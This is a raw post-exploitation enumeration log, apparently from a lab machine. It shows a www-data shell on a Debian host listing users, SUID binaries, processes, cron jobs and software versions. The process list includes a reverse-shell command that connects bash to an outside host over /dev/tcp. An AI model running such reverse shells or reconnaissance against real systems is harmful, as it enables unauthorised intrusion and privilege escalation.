System/Kernel
www-data@debian:/$ uname -a ; cat /etc/*release
Linux debian 5.10.0-25-amd64 #1 SMP Debian 5.10.191-1 (2023-08-16) x86_64 GNU/Linux
PRETTY_NAME="Debian GNU/Linux 11 (bullseye)"
NAME="Debian GNU/Linux"
VERSION_ID="11"
VERSION="11 (bullseye)"
VERSION_CODENAME=bullseye
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"5.10.0-25-amd64x86_64Debian GNU/Linux 11 (bullseye)
Networks
www-data@debian:/$ ip route ; arp -a
default via 192.168.201.254 dev ens192 onlink
192.168.201.0/24 dev ens192 proto kernel scope link src 192.168.201.38
? (192.168.201.254) at 00:50:56:9e:df:ab [ether] on ens192www-data@debian:/$ netstat -antup
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 140 192.168.201.38:58508 192.168.45.249:9999 ESTABLISHED 1315/bash
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 192.168.201.38:80 192.168.45.249:59214 TIME_WAIT -
tcp6 0 0 192.168.201.38:80 192.168.45.249:46410 TIME_WAIT -
tcp6 0 0 192.168.201.38:80 192.168.45.249:59212 TIME_WAIT -
tcp6 0 0 192.168.201.38:80 192.168.45.249:44710 TIME_WAIT -
tcp6 0 0 192.168.201.38:80 192.168.45.249:59206 TIME_WAIT -
tcp6 0 0 192.168.201.38:80 192.168.45.249:59218 ESTABLISHED -
udp 0 0 0.0.0.0:50755 0.0.0.0:* - tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
Users & Groups
www-data@debian:/$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
skunk:x:1001:1001::/home/skunk:/bin/bash
total 12K
4.0K drwxr-xr-x 2 skunk skunk 4.0K Dec 8 2023 skunk
4.0K drwxr-xr-x 3 root root 4.0K Dec 8 2023 .
4.0K drwxr-xr-x 18 root root 4.0K Sep 19 2023 ..skunk
www-data@debian:/$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=101(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=102(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=103(messagebus) gid=109(messagebus) groups=109(messagebus)
uid=104(systemd-timesync) gid=110(systemd-timesync) groups=110(systemd-timesync)
uid=105(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
uid=106(mysql) gid=112(mysql) groups=112(mysql)
uid=1001(skunk) gid=1001(skunk) groups=1001(skunk),27(sudo),33(www-data)uid=1001(skunk) gid=1001(skunk) groups=1001(skunk),27(sudo),33(www-data)
SUIDs
www-data@debian:/$ find / -perm -04000 -ls -type f 2>/dev/null | grep -v '/snap'
136738 52 -rwsr-xr-- 1 root messagebus 51336 Oct 5 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
136305 472 -rwsr-xr-x 1 root root 481608 Sep 23 2023 /usr/lib/openssh/ssh-keysign
652890 52 -rwsr-xr-x 1 root root 52880 Feb 7 2020 /usr/bin/chsh
652889 60 -rwsr-xr-x 1 root root 58416 Feb 7 2020 /usr/bin/chfn
664617 36 -rwsr-xr-x 1 root root 34896 Feb 26 2021 /usr/bin/fusermount
656361 44 -rwsr-xr-x 1 root root 44632 Feb 7 2020 /usr/bin/newgrp
656796 36 -rwsr-xr-x 1 root root 35040 Jan 20 2022 /usr/bin/umount
652893 64 -rwsr-xr-x 1 root root 63960 Feb 7 2020 /usr/bin/passwd
656505 72 -rwsr-xr-x 1 root root 71912 Jan 20 2022 /usr/bin/su
652892 88 -rwsr-xr-x 1 root root 88304 Feb 7 2020 /usr/bin/gpasswd
656794 56 -rwsr-xr-x 1 root root 55528 Jan 20 2022 /usr/bin/mount
653183 180 -rwsr-xr-x 1 root root 182600 Jan 14 2023 /usr/bin/sudoSGIDs
www-data@debian:/$ find / -type f -perm -02000 -ls 2>/dev/null | grep -v '/snap'
652873 40 -rwxr-sr-x 1 root shadow 38912 Aug 26 2021 /usr/sbin/unix_chkpwd
660667 24 -rwxr-sr-x 1 root tty 22760 Jan 20 2022 /usr/bin/write.ul
652888 80 -rwxr-sr-x 1 root shadow 80256 Feb 7 2020 /usr/bin/chage
662575 24 -rwxr-sr-x 1 root mail 23040 Feb 4 2021 /usr/bin/dotlockfile
657970 44 -rwxr-sr-x 1 root crontab 43568 Feb 22 2021 /usr/bin/crontab
657575 348 -rwxr-sr-x 1 root ssh 354440 Sep 23 2023 /usr/bin/ssh-agent
654299 36 -rwxr-sr-x 1 root tty 35048 Jan 20 2022 /usr/bin/wall
652891 32 -rwxr-sr-x 1 root shadow 31160 Feb 7 2020 /usr/bin/expiryCapabilities
www-data@debian:/$ getcap -r / 2>/dev/null
/usr/bin/ping cap_net_raw=epProcesses
www-data@debian:/$ ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.5 163696 10116 ? Ss 06:55 0:00 /sbin/init
root 226 0.0 0.7 48396 14628 ? Ss 06:55 0:00 /lib/systemd/systemd-journald
root 248 0.0 0.2 21716 5228 ? Ss 06:55 0:00 /lib/systemd/systemd-udevd
systemd+ 439 0.0 0.2 88436 5940 ? Ssl 06:55 0:00 /lib/systemd/systemd-timesyncd
root 442 0.0 0.5 47748 10280 ? Ss 06:55 0:00 /usr/bin/VGAuthService
root 443 0.0 0.5 163072 11552 ? Ssl 06:55 0:01 /usr/bin/vmtoolsd
root 470 0.0 0.1 6744 2808 ? Ss 06:55 0:00 /usr/sbin/cron -f
message+ 471 0.0 0.2 8272 4132 ? Ss 06:55 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 474 0.0 0.3 220796 6588 ? Ssl 06:55 0:00 /usr/sbin/rsyslogd -n -iNONE
root 477 0.0 0.2 13400 5540 ? Ss 06:55 0:00 /lib/systemd/systemd-logind
root 491 0.0 0.0 5844 1712 tty1 Ss+ 06:55 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 502 0.0 0.3 13352 7128 ? Ss 06:55 0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
mysql 577 0.0 4.9 1411320 100464 ? Ssl 06:55 0:00 /usr/sbin/mariadbd
root 605 0.0 1.2 209180 25344 ? Ss 06:55 0:00 /usr/sbin/apache2 -k start
www-data 931 0.0 1.8 214796 37764 ? S 06:57 0:00 /usr/sbin/apache2 -k start
www-data 932 0.0 1.8 214776 38304 ? S 06:57 0:00 /usr/sbin/apache2 -k start
www-data 933 0.0 1.7 212672 35444 ? S 06:57 0:00 /usr/sbin/apache2 -k start
www-data 934 0.0 1.7 212700 35480 ? S 06:57 0:00 /usr/sbin/apache2 -k start
www-data 935 0.0 1.9 214888 40084 ? S 06:57 0:00 /usr/sbin/apache2 -k start
www-data 1047 0.0 1.8 214564 37188 ? S 06:58 0:00 /usr/sbin/apache2 -k start
www-data 1313 0.0 0.0 2480 576 ? S 07:15 0:00 sh -c bash -c "bash -i >& \/dev\/tcp\/192.168.45.249\/9999 0>&1"
www-data 1314 0.0 0.1 3896 2896 ? S 07:15 0:00 bash -c bash -i >& \/dev\/tcp\/192.168.45.249\/9999 0>&1
www-data 1315 0.0 0.1 4160 3400 ? S 07:15 0:00 bash -i
www-data 1373 0.0 0.1 6932 3136 ? R 07:16 0:00 ps -auxwwwroot 470 0.0 0.1 6744 2808 ? Ss 06:55 0:00 /usr/sbin/cron -fmysql 577 0.0 4.9 1411320 100464 ? Ssl 06:55 0:00 /usr/sbin/mariadbd
Cron & Systemd
www-data@debian:/$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for www-data
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
NEXT LEFT LAST PASSED UNIT ACTIVATES
Sun 2025-04-06 07:21:08 EDT 5min left Fri 2024-08-02 18:06:47 EDT 8 months 3 days ago apt-daily-upgrade.timer apt-daily-upgrade.service
Sun 2025-04-06 07:39:00 EDT 22min left Sun 2025-04-06 07:09:01 EDT 7min ago phpsessionclean.timer phpsessionclean.service
Sun 2025-04-06 15:16:23 EDT 8h left Fri 2023-12-08 10:51:41 EST 1 years 3 months ago apt-daily.timer apt-daily.service
Mon 2025-04-07 00:00:00 EDT 16h left Sun 2025-04-06 06:57:22 EDT 18min ago logrotate.timer logrotate.service
Mon 2025-04-07 00:00:00 EDT 16h left Sun 2025-04-06 06:57:22 EDT 18min ago man-db.timer man-db.service
Mon 2025-04-07 00:18:25 EDT 17h left Sun 2025-04-06 06:59:16 EDT 16min ago fstrim.timer fstrim.service
Mon 2025-04-07 07:10:14 EDT 23h left Sun 2025-04-06 07:10:13 EDT 5min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Sun 2025-04-13 03:10:03 EDT 6 days left Sun 2025-04-06 06:57:22 EDT 18min ago e2scrub_all.timer e2scrub_all.service
8 timers listed.
Pass --all to see loaded but inactive timers, too.Services
www-data@debian:/$ systemctl list-units --state=running
UNIT LOAD ACTIVE SUB DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
init.scope loaded active running System and Service Manager
apache2.service loaded active running The Apache HTTP Server
cron.service loaded active running Regular background program processing daemon
dbus.service loaded active running D-Bus System Message Bus
getty@tty1.service loaded active running Getty on tty1
mariadb.service loaded active running MariaDB 10.5.21 database server
open-vm-tools.service loaded active running Service for virtual machines hosted on VMware
rsyslog.service loaded active running System Logging Service
ssh.service loaded active running OpenBSD Secure Shell server
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running User Login Management
systemd-timesyncd.service loaded active running Network Time Synchronization
systemd-udevd.service loaded active running Rule-based Manager for Device Events and Files
vgauth.service loaded active running Authentication service for virtual machines hosted on VMware
dbus.socket loaded active running D-Bus System Message Bus Socket
syslog.socket loaded active running Syslog Socket
systemd-journald-audit.socket loaded active running Journal Audit Socket
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket loaded active running Journal Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
22 loaded units listed.apache2.servicemariadb.service
Sudo Version
www-data@debian:/$ sudo --version
Sudo version 1.9.5p2
Sudoers policy plugin version 1.9.5p2
Sudoers file grammar version 48
Sudoers I/O plugin version 1.9.5p2
Sudoers audit plugin version 1.9.5p2Sudo version 1.9.5p2
Glibc Version
www-data@debian:/$ ldd --version
ldd (Debian GLIBC 2.31-13+deb11u6) 2.31
Copyright (C) 2020 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.ldd (Debian GLIBC 2.31-13+deb11u6) 2.31